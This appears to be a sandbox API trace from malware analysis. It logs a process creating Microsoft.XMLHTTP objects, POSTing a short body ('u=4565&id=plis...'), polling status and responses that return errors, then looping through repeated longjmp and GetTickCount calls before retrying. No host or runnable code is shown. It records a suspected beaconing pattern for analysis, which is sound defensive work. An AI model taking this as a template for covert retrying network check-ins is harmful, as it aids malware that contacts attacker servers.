varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80070057), puArgErr=0x26d8c0*=0x26dd90) returned 0x80020009
	[0057.509] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0057.509] longjmp () 
	[0057.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0057.509] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0057.509] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0057.509] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x26d8c0*=0x26dd90) returned 0x80020009
	[0057.517] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0057.517] longjmp () 
	[0057.517] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0057.517] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0057.517] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0057.518] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8000000a, varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="The data necessary to complete this operation is not yet available.\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x8000000a), puArgErr=0x26d8c0*=0x26dd90) returned 0x80020009
	[0057.518] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0057.518] longjmp () 
	[0057.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0057.519] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0057.519] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0057.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0057.519] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x80004005, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x26d170*=0x0) returned 0x80020009
	[0057.519] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0057.519] longjmp () 
	[0057.523] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0057.523] malloc (_Size=0x88) returned 0x3c88b0
	[0057.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0057.525] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0057.525] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0057.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0057.525] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x80004005, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x26d170*=0xffffffff) returned 0x80020009
	[0057.525] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0057.525] longjmp () 
	[0057.526] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0057.526] malloc (_Size=0x88) returned 0x3c88b0
	[0057.528] XMLHTTPRequest:IUnknown:Release (This=0x42e060) returned 0x0
	[0057.528] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0057.531] GetTickCount () returned 0x114783c
	[0057.531] longjmp () 
	[0057.531] longjmp () 
	[0057.531] longjmp () 
	[0057.532] GetCurrentThreadId () returned 0x9a8
	[0057.532] GetCurrentThreadId () returned 0x9a8
	[0057.532] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0057.532] malloc (_Size=0x80) returned 0x3c88b0
	[0057.532] longjmp () 
	[0057.532] longjmp () 
	[0057.532] longjmp () 
	[0057.533] longjmp () 
	[0057.533] longjmp () 
	[0057.533] longjmp () 
	[0057.533] longjmp () 
	[0057.534] longjmp () 
	[0057.534] longjmp () 
	[0057.534] longjmp () 
	[0057.534] longjmp () 
	[0057.534] longjmp () 
	[0057.535] longjmp () 
	[0057.535] longjmp () 
	[0057.535] longjmp () 
	[0057.535] longjmp () 
	[0057.535] longjmp () 
	[0057.536] longjmp () 
	[0057.536] longjmp () 
	[0057.536] longjmp () 
	[0057.536] longjmp () 
	[0057.536] longjmp () 
	[0057.537] longjmp () 
	[0057.537] longjmp () 
	[0057.537] longjmp () 
	[0057.537] longjmp () 
	[0057.537] longjmp () 
	[0057.537] GetTickCount () returned 0x114784c
	[0057.538] longjmp () 
	[0057.538] longjmp () 
	[0057.538] longjmp () 
	[0057.538] longjmp () 
	[0057.538] longjmp () 
	[0057.538] longjmp () 
	[0057.539] longjmp () 
	[0057.539] longjmp () 
	[0057.539] longjmp () 
	[0057.539] longjmp () 
	[0057.540] longjmp () 
	[0057.540] longjmp () 
	[0057.540] longjmp () 
	[0057.540] longjmp () 
	[0057.540] longjmp () 
	[0057.540] longjmp () 
	[0057.541] longjmp () 
	[0057.541] longjmp () 
	[0057.541] longjmp () 
	[0057.541] longjmp () 
	[0057.541] longjmp () 
	[0057.541] longjmp () 
	[0057.542] longjmp () 
	[0057.542] longjmp () 
	[0057.542] longjmp () 
	[0057.542] longjmp () 
	[0057.542] longjmp () 
	[0057.543] longjmp () 
	[0057.543] longjmp () 
	[0057.543] longjmp () 
	[0057.543] longjmp () 
	[0057.543] longjmp () 
	[0057.543] GetTickCount () returned 0x114784c
	[0057.544] longjmp () 
	[0057.544] longjmp () 
	[0057.544] longjmp () 
	[0057.544] longjmp () 
	[0057.544] longjmp () 
	[0057.544] longjmp () 
	[0057.545] longjmp () 
	[0057.545] longjmp () 
	[0057.545] longjmp () 
	[0057.545] longjmp () 
	[0057.545] longjmp () 
	[0057.546] longjmp () 
	[0057.546] longjmp () 
	[0057.546] longjmp () 
	[0057.546] longjmp () 
	[0057.546] longjmp () 
	[0057.546] longjmp () 
	[0057.547] longjmp () 
	[0057.547] longjmp () 
	[0057.547] longjmp () 
	[0057.547] longjmp () 
	[0057.547] longjmp () 
	[0057.548] longjmp () 
	[0057.548] longjmp () 
	[0057.548] longjmp () 
	[0057.548] longjmp () 
	[0057.548] longjmp () 
	[0057.549] longjmp () 
	[0057.549] longjmp () 
	[0057.549] longjmp () 
	[0057.549] longjmp () 
	[0057.550] longjmp () 
	[0057.550] GetTickCount () returned 0x114785b
	[0057.550] longjmp () 
	[0057.550] longjmp () 
	[0057.550] longjmp () 
	[0057.550] longjmp () 
	[0057.551] longjmp () 
	[0057.551] longjmp () 
	[0057.551] longjmp () 
	[0057.551] longjmp () 
	[0057.551] longjmp () 
	[0057.551] longjmp () 
	[0057.552] longjmp () 
	[0057.552] longjmp () 
	[0057.552] longjmp () 
	[0057.552] longjmp () 
	[0057.552] longjmp () 
	[0057.552] longjmp () 
	[0057.553] longjmp () 
	[0057.553] longjmp () 
	[0057.553] longjmp () 
	[0057.553] longjmp () 
	[0057.553] longjmp () 
	[0057.554] longjmp () 
	[0057.554] longjmp () 
	[0057.554] longjmp () 
	[0057.554] longjmp () 
	[0057.554] longjmp () 
	[0057.554] longjmp () 
	[0057.555] longjmp () 
	[0057.555] longjmp () 
	[0057.555] longjmp () 
	[0057.555] longjmp () 
	[0057.555] longjmp () 
	[0057.555] GetTickCount () returned 0x114785b
	[0057.556] longjmp () 
	[0057.556] longjmp () 
	[0057.556] longjmp () 
	[0057.556] longjmp () 
	[0057.556] longjmp () 
	[0057.556] longjmp () 
	[0057.557] longjmp () 
	[0057.557] longjmp () 
	[0057.557] longjmp () 
	[0057.557] longjmp () 
	[0057.557] longjmp () 
	[0057.558] longjmp () 
	[0057.558] longjmp () 
	[0057.558] longjmp () 
	[0057.558] longjmp () 
	[0057.558] longjmp () 
	[0057.558] longjmp () 
	[0057.559] longjmp () 
	[0057.559] longjmp () 
	[0057.559] longjmp () 
	[0057.559] longjmp () 
	[0057.559] longjmp () 
	[0057.560] longjmp () 
	[0057.560] longjmp () 
	[0057.560] longjmp () 
	[0057.560] longjmp () 
	[0057.560] longjmp () 
	[0057.560] longjmp () 
	[0057.561] longjmp () 
	[0057.561] longjmp () 
	[0057.561] longjmp () 
	[0057.561] longjmp () 
	[0057.561] GetTickCount () returned 0x114785b
	[0057.561] longjmp () 
	[0057.561] longjmp () 
	[0057.562] longjmp () 
	[0057.562] longjmp () 
	[0057.562] longjmp () 
	[0057.562] longjmp () 
	[0057.562] longjmp () 
	[0057.563] longjmp () 
	[0057.563] longjmp () 
	[0057.563] longjmp () 
	[0057.563] longjmp () 
	[0057.563] longjmp () 
	[0057.564] longjmp () 
	[0057.564] longjmp () 
	[0057.564] longjmp () 
	[0057.564] longjmp () 
	[0057.564] longjmp () 
	[0057.565] longjmp () 
	[0057.565] longjmp () 
	[0057.566] longjmp () 
	[0057.566] longjmp () 
	[0057.566] longjmp () 
	[0057.566] longjmp () 
	[0057.566] longjmp () 
	[0057.567] longjmp () 
	[0057.567] longjmp () 
	[0057.567] longjmp () 
	[0057.567] longjmp () 
	[0057.567] longjmp () 
	[0057.567] longjmp () 
	[0057.568] longjmp () 
	[0057.568] longjmp () 
	[0057.568] GetTickCount () returned 0x114786b
	[0057.568] longjmp () 
	[0057.568] longjmp () 
	[0057.568] longjmp () 
	[0057.569] longjmp () 
	[0057.569] longjmp () 
	[0057.569] longjmp () 
	[0057.569] longjmp () 
	[0057.569] longjmp () 
	[0057.569] longjmp () 
	[0057.570] longjmp () 
	[0057.570] longjmp () 
	[0057.570] longjmp () 
	[0057.570] longjmp () 
	[0057.570] longjmp () 
	[0057.571] longjmp () 
	[0057.571] longjmp () 
	[0057.571] longjmp () 
	[0057.571] longjmp () 
	[0057.571] longjmp () 
	[0057.571] longjmp () 
	[0057.572] longjmp () 
	[0057.572] longjmp () 
	[0057.572] longjmp () 
	[0057.572] longjmp () 
	[0057.572] longjmp () 
	[0057.572] longjmp () 
	[0057.573] longjmp () 
	[0057.573] longjmp () 
	[0057.573] longjmp () 
	[0057.573] longjmp () 
	[0057.573] longjmp () 
	[0057.574] longjmp () 
	[0057.574] GetTickCount () returned 0x114786b
	[0057.574] longjmp () 
	[0057.574] longjmp () 
	[0057.574] longjmp () 
	[0057.574] longjmp () 
	[0057.574] longjmp () 
	[0057.575] longjmp () 
	[0057.575] longjmp () 
	[0057.575] longjmp () 
	[0057.575] longjmp () 
	[0057.575] longjmp () 
	[0057.576] longjmp () 
	[0057.576] longjmp () 
	[0057.576] longjmp () 
	[0057.576] longjmp () 
	[0057.577] longjmp () 
	[0057.577] longjmp () 
	[0057.577] longjmp () 
	[0057.577] longjmp () 
	[0057.578] longjmp () 
	[0057.578] longjmp () 
	[0057.579] longjmp () 
	[0057.579] longjmp () 
	[0057.579] longjmp () 
	[0057.580] longjmp () 
	[0057.580] longjmp () 
	[0057.580] longjmp () 
	[0057.581] longjmp () 
	[0057.581] longjmp () 
	[0057.581] longjmp () 
	[0057.582] longjmp () 
	[0057.582] longjmp () 
	[0057.582] longjmp () 
	[0057.583] GetTickCount () returned 0x114787b
	[0057.583] longjmp () 
	[0057.583] longjmp () 
	[0057.584] longjmp () 
	[0057.584] longjmp () 
	[0057.584] longjmp () 
	[0057.585] longjmp () 
	[0057.585] longjmp () 
	[0057.585] longjmp () 
	[0057.586] longjmp () 
	[0057.586] longjmp () 
	[0057.586] longjmp () 
	[0057.587] longjmp () 
	[0057.587] longjmp () 
	[0057.587] longjmp () 
	[0057.588] longjmp () 
	[0057.588] longjmp () 
	[0057.588] longjmp () 
	[0057.588] longjmp () 
	[0057.589] longjmp () 
	[0057.589] longjmp () 
	[0057.590] longjmp () 
	[0057.590] longjmp () 
	[0057.590] longjmp () 
	[0057.591] longjmp () 
	[0057.591] longjmp () 
	[0057.591] longjmp () 
	[0057.592] longjmp () 
	[0057.592] longjmp () 
	[0057.592] longjmp () 
	[0057.593] longjmp () 
	[0057.593] longjmp () 
	[0057.594] longjmp () 
	[0057.594] GetTickCount () returned 0x114787b
	[0057.594] longjmp () 
	[0057.594] longjmp () 
	[0057.594] longjmp () 
	[0057.595] longjmp () 
	[0057.595] longjmp () 
	[0057.595] longjmp () 
	[0057.595] longjmp () 
	[0057.595] longjmp () 
	[0057.596] longjmp () 
	[0057.598] longjmp () 
	[0057.598] longjmp () 
	[0057.598] longjmp () 
	[0057.598] longjmp () 
	[0057.598] longjmp () 
	[0057.599] longjmp () 
	[0057.599] longjmp () 
	[0057.599] longjmp () 
	[0057.599] longjmp () 
	[0057.600] longjmp () 
	[0057.600] longjmp () 
	[0057.600] longjmp () 
	[0057.600] longjmp () 
	[0057.600] longjmp () 
	[0057.601] longjmp () 
	[0057.601] longjmp () 
	[0057.601] longjmp () 
	[0057.601] longjmp () 
	[0057.602] longjmp () 
	[0057.602] longjmp () 
	[0057.602] longjmp () 
	[0057.602] longjmp () 
	[0057.603] longjmp () 
	[0057.603] GetTickCount () returned 0x114788a
	[0057.603] longjmp () 
	[0057.603] longjmp () 
	[0057.603] longjmp () 
	[0057.604] longjmp () 
	[0057.604] longjmp () 
	[0057.604] longjmp () 
	[0057.604] longjmp () 
	[0057.605] longjmp () 
	[0057.605] longjmp () 
	[0057.605] longjmp () 
	[0057.606] longjmp () 
	[0057.606] longjmp () 
	[0057.606] longjmp () 
	[0057.606] longjmp () 
	[0057.607] longjmp () 
	[0057.607] longjmp () 
	[0057.607] longjmp () 
	[0057.607] longjmp () 
	[0057.607] longjmp () 
	[0057.608] longjmp () 
	[0057.608] longjmp () 
	[0057.608] longjmp () 
	[0057.608] longjmp () 
	[0057.608] longjmp () 
	[0057.609] longjmp () 
	[0057.609] longjmp () 
	[0057.609] longjmp () 
	[0057.609] longjmp () 
	[0057.609] longjmp () 
	[0057.610] longjmp () 
	[0057.610] longjmp () 
	[0057.610] longjmp () 
	[0057.610] GetTickCount () returned 0x114788a
	[0057.610] longjmp () 
	[0057.610] longjmp () 
	[0057.611] longjmp () 
	[0057.611] longjmp () 
	[0057.611] longjmp () 
	[0057.619] longjmp () 
	[0057.619] longjmp () 
	[0057.619] longjmp () 
	[0057.619] longjmp () 
	[0057.619] longjmp () 
	[0057.620] longjmp () 
	[0057.620] longjmp () 
	[0057.620] longjmp () 
	[0057.620] longjmp () 
	[0057.620] longjmp () 
	[0057.620] longjmp () 
	[0057.621] longjmp () 
	[0057.621] longjmp () 
	[0057.621] longjmp () 
	[0057.621] longjmp () 
	[0057.621] longjmp () 
	[0057.621] longjmp () 
	[0057.622] longjmp () 
	[0057.622] longjmp () 
	[0057.622] longjmp () 
	[0057.622] longjmp () 
	[0057.622] longjmp () 
	[0057.622] longjmp () 
	[0057.623] longjmp () 
	[0057.623] longjmp () 
	[0057.623] longjmp () 
	[0057.623] longjmp () 
	[0057.623] GetTickCount () returned 0x114789a
	[0057.623] longjmp () 
	[0057.623] longjmp () 
	[0057.624] longjmp () 
	[0057.624] longjmp () 
	[0057.624] longjmp () 
	[0057.624] longjmp () 
	[0057.624] longjmp () 
	[0057.624] longjmp () 
	[0057.625] longjmp () 
	[0057.625] longjmp () 
	[0057.625] longjmp () 
	[0057.625] longjmp () 
	[0057.625] longjmp () 
	[0057.625] longjmp () 
	[0057.626] longjmp () 
	[0057.626] longjmp () 
	[0057.626] longjmp () 
	[0057.626] longjmp () 
	[0057.626] longjmp () 
	[0057.626] longjmp () 
	[0057.627] longjmp () 
	[0057.627] longjmp () 
	[0057.627] longjmp () 
	[0057.627] longjmp () 
	[0057.628] longjmp () 
	[0057.628] longjmp () 
	[0057.628] longjmp () 
	[0057.628] longjmp () 
	[0057.628] longjmp () 
	[0057.628] longjmp () 
	[0057.629] longjmp () 
	[0057.629] longjmp () 
	[0057.629] GetTickCount () returned 0x11478a9
	[0057.629] longjmp () 
	[0057.629] longjmp () 
	[0057.629] longjmp () 
	[0057.629] longjmp () 
	[0057.630] longjmp () 
	[0057.630] longjmp () 
	[0057.630] longjmp () 
	[0057.630] longjmp () 
	[0057.630] longjmp () 
	[0057.630] longjmp () 
	[0057.631] longjmp () 
	[0057.631] longjmp () 
	[0057.631] longjmp () 
	[0057.631] longjmp () 
	[0057.631] longjmp () 
	[0057.631] longjmp () 
	[0057.632] longjmp () 
	[0057.632] longjmp () 
	[0057.633] longjmp () 
	[0057.634] longjmp () 
	[0057.634] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0057.634] SysStringLen (param_1=0x0) returned 0x0
	[0057.634] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0057.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0057.634] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0057.634] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0057.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b08) returned 0x0
	[0057.634] ??2@YAPEAX_K@Z () returned 0x42ef20
	[0057.634] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b08, pUnkSite=0x42ef20) returned 0x0
	[0057.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IUnknown:AddRef (This=0x42ef20) returned 0x2
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x42ef20) returned 0x0
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x42ef20) returned 0x0
